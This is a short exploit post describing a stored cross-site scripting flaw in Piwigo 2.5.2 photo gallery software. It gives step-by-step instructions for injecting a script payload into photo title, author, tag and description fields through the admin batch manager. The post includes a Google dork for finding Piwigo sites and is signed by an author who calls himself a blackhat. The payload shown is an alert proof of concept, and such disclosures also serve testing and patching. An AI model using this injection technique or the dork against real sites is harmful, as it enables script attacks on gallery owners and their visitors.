#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~# # # Exploit Title: Piwigo 2.5.2 <= Cross Site Scripting # Date: 2013 26 September # Author: Arsan # Software Homepage: http://www.piwigo.org # Version : 2.5.2 # Tested on: Linux & Windows # Category: webapps # Google Dork: intext:"Powered by Piwigo" # #~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~# # # [+] Exploit : # # [-] About Piwigo : # # Host and share your photos with Piwigo # Piwigo is photo gallery software for the web, built by an active community of users and developers. # Extensions make Piwigo easily customizable. Icing on the cake, Piwigo is free and opensource. # Browse the demo (http://www.piwigo.org/demo) to discover Piwigo features on gallery side and change graphical theme on the fly. # # [-] Description : # # 1) Download "Piwigo" And Install. # 2) Create New Album ( Photos > Add > create a new album ) ~> Follow this link : # http://localhost/piwigo/admin.php?page=photos_add # 3) Insert A photo In Your Album And Save It. # 4) And Go To Photo Edit; Follow This Way : # Photos > Batch Manager > single mode # http://localhost/piwigo/admin.php?page=batch_manager&mode=unit # 5) Now Insert This Code In "Title","Author","Tags","Description" : # "><script>alert(/Arsan/)</script> # 6) Try To See Your Photo In Gallery; # http://localhost/cms/piwigo/picture.php?/[Number Photo]/category/[Number Album] # :) You See Alert "Arsan" . Enjoy ;) # #~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~# # # [+] Demo : # # http://www.piwigo.org/demo # #~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~# # # [+] Contact Me : # # Arsan.Blackhat@gmail.com # Twitter.com/ArsanBlackhat # #~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~# # I L0ve Inj3ct0r Team #~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#